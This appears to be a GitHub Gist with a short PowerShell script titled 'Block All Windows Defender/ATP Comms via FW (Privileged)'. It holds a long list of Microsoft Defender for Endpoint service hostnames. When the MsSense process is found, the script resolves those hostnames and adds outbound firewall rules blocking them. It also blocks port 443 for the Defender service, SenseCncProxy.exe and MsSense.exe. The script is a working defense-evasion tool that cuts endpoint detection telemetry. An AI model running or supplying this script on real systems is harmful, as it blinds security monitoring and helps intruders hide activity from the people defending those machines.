Last active
August 12, 2024 16:19
-
-
Save ricardojba/49bf6d439d5dba3346cc279198c7676b to your computer and use it in GitHub Desktop.
Block All Windows Defender/ATP Comms via FW (Privileged)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-proxy-internet?view=o365-worldwide#enable-access-to-microsoft-defender-atp-service-urls-in-the-proxy-server | |
| # https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx | |
| # https://download.microsoft.com/download/6/a/0/6a041da5-c43b-4f17-8167-79dfdc10507f/mde-urls-gov.xlsx | |
| $MSATPURLs = "automatedirstrffusgt.blob.core.usgovcloudapi.net", "automatedirstrffusgv.blob.core.usgovcloudapi.net", "automatedirstrfmusmt.blob.core.usgovcloudapi.net", "automatedirstrfmusmv.blob.core.usgovcloudapi.net", "automatedirstrprdcus", "automatedirstrprdcus.blob.core.windows.net", "automatedirstrprdcus3.blob.core.windows.net", "automatedirstrprdeus.blob.core.windows.net", "automatedirstrprdeus3.blob.core.windows.net", "automatedirstrprdneu.blob.core.windows.net", "automatedirstrprdneu3.blob.core.windows.net", "automatedirstrprduks.blob.core.windows.net", "automatedirstrprdukw.blob.core.windows.net", "automatedirstrprdweu.blob.core.windows.net", "automatedirstrprdweu3.blob.core.windows.net", "blob.core.usgovcloudapi.net", "blob.core.windows.net ", "blob.core.windows.net", "cdn.x.cp.wd.microsoft.com", "checkappexec.microsoft.com", "cloudsink.net", "crl.microsoft.com", "ctldl.windowsupdate.com", "definitionupdates.microsoft.com", "delivery.mp.microsoft.com", "dm.microsoft.com", "download.microsoft.com", "download.windowsupdate.com", "endpoint.security.microsoft.com", "enterpriseregistration.windows.net", "eu-v20.events.data.microsoft.com", "eu.vortex-win.data.microsoft.com", "europe.x.cp.wd.microsoft.com", "events.data.microsoft.com", "fe3cr.delivery.mp.microsoft.com", "go.microsoft.com", "login.live.com", "login.microsoftonline.com", "login.windows.net", "microsoftonline-p.com", "msdl.microsoft.com", "ods.opinsights.azure.com", "ods.opinsights.azure.us", "officecdn-microsoft-com.akamaized.net", "oms.opinsights.azure.com", "oms.opinsights.azure.us", "onboardingpackagescusprd.blob.core.windows.net", "packages.microsoft.com", "psapp.microsoft.com", "psappeu.microsoft.com", "secure.aadcdn.microsoftonline-p.com", "security.microsoft.com", "securitycenter.windows.com", "settings-win.data.microsoft.com", "smartscreen-prod.microsoft.com", "smartscreen.microsoft.com", "static2.sharepointonline.com", "uk-v20.events.data.microsoft.com", "uk.vortex-win.data.microsoft.com", "unitedkingdom.x.cp.wd.microsoft.com", "unitedstates.x.cp.wd.microsoft.com", "unitedstates1.cp.wd.microsoft.us", "unitedstates1.ss.wd.microsoft.us", "unitedstates1.x.cp.wd.microsoft.us", "unitedstates2.cp.wd.microsoft.us", "unitedstates2.ss.wd.microsoft.us", "unitedstates2.x.cp.wd.microsoft.us", "unitedstates4.cp.wd.microsoft.us", "unitedstates4.ss.wd.microsoft.us", "unitedstates4.x.cp.wd.microsoft.us", "update.microsoft.com", "urs.microsoft.com", "us-v20.events.data.microsoft.com", "us.vortex-win.data.microsoft.com", "us4-v20.events.data.microsoft.com", "usseu1northprod.blob.core.windows.net", "usseu1westprod.blob.core.windows.net", "ussuk1southprod.blob.core.windows.net", "ussuk1westprod.blob.core.windows.net", "ussus1eastprod.blob.core.windows.net", "ussus1westprod.blob.core.windows.net", "ussus2eastprod.blob.core.windows.net", "ussus2westprod.blob.core.windows.net", "ussus3eastprod.blob.core.windows.net", "ussus3westprod.blob.core.windows.net", "ussus4eastprod.blob.core.windows.net", "ussus4westprod.blob.core.windows.net", "ussusd1centralff5.blob.core.usgovcloudapi.net", "ussusd1eastff5.blob.core.usgovcloudapi.net", "ussusd2centralff5.blob.core.usgovcloudapi.net", "ussusd2eastff5.blob.core.usgovcloudapi.net", "ussusg1texasff0.blob.core.usgovcloudapi.net", "ussusg1texasff4.blob.core.usgovcloudapi.net", "ussusg1virginiaff0.blob.core.usgovcloudapi.net", "ussusg1virginiaff4.blob.core.usgovcloudapi.net", "ussusg2texasff0.blob.core.usgovcloudapi.net", "ussusg2texasff4.blob.core.usgovcloudapi.net", "ussusg2virginiaff0.blob.core.usgovcloudapi.net", "ussusg2virginiaff4.blob.core.usgovcloudapi.net", "vortex-win.data.microsoft.com", "wd.microsoft.com", "wdcp.microsoft.com", "wdcpalt.microsoft.com", "winatp-gw-cus", "winatp-gw-cus.microsoft.com", "winatp-gw-cus3.microsoft.com", "winatp-gw-eus.microsoft.com", "winatp-gw-eus3.microsoft.com", "winatp-gw-neu.microsoft.com", "winatp-gw-neu3.microsoft.com", "winatp-gw-uks.microsoft.com", "winatp-gw-ukw.microsoft.com", "winatp-gw-usgt.microsoft.com", "winatp-gw-usgv.microsoft.com", "winatp-gw-usmt.microsoft.com", "winatp-gw-usmv.microsoft.com", "winatp-gw-weu.microsoft.com", "winatp-gw-weu3.microsoft.com", "windowsupdate.com", "wns.windows.com", "wseu1northprod.blob.core.windows.net", "wseu1westprod.blob.core.windows.net", "wsuk1southprod.blob.core.windows.net", "wsuk1westprod.blob.core.windows.net", "wsus1eastprod.blob.core.windows.net", "wsus1westprod.blob.core.windows.net", "wsus2eastprod.blob.core.windows.net", "wsus2westprod.blob.core.windows.net", "wsusd1centralff5.blob.core.usgovcloudapi.net", "wsusd1eastff5.blob.core.usgovcloudapi.net", "wsusg1texasff0.blob.core.usgovcloudapi.net", "wsusg1texasff4.blob.core.usgovcloudapi.net", "wsusg1virginiaff0.blob.core.usgovcloudapi.net", "wsusg1virginiaff4.blob.core.usgovcloudapi.net", "www.microsoft.com", "x.cp.wd.microsoft.com" | |
| [CmdletBinding()] | |
| $processnames = Get-process | Select-Object ProcessName | |
| Foreach ($ps in $processnames) { | |
| if ($ps.ProcessName -like "*MsSense*") { | |
| Write-Output ("[*] Defender ATP process " + $ps.ProcessName + " is running. Resolving ATP FQDN IP's and blocking them.") | |
| $MSATPCloudIPs = ($MSATPURLs | Foreach {[System.Net.Dns]::GetHostAddresses($_) | Select-Object -ExpandProperty IPAddressToString | Foreach-Object { | |
| New-NetFirewallRule -DisplayName "Block Microsoft Defender ATP" -Enabled True -Action Block -LocalPort Any -Protocol TCP -Direction Outbound -RemoteAddress "$_" | |
| Write-Host "$_ - Outbound Firewall Block Was Added: $?" | |
| }}) | |
| } | |
| } | |
| New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block | |
| New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block | |
| New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment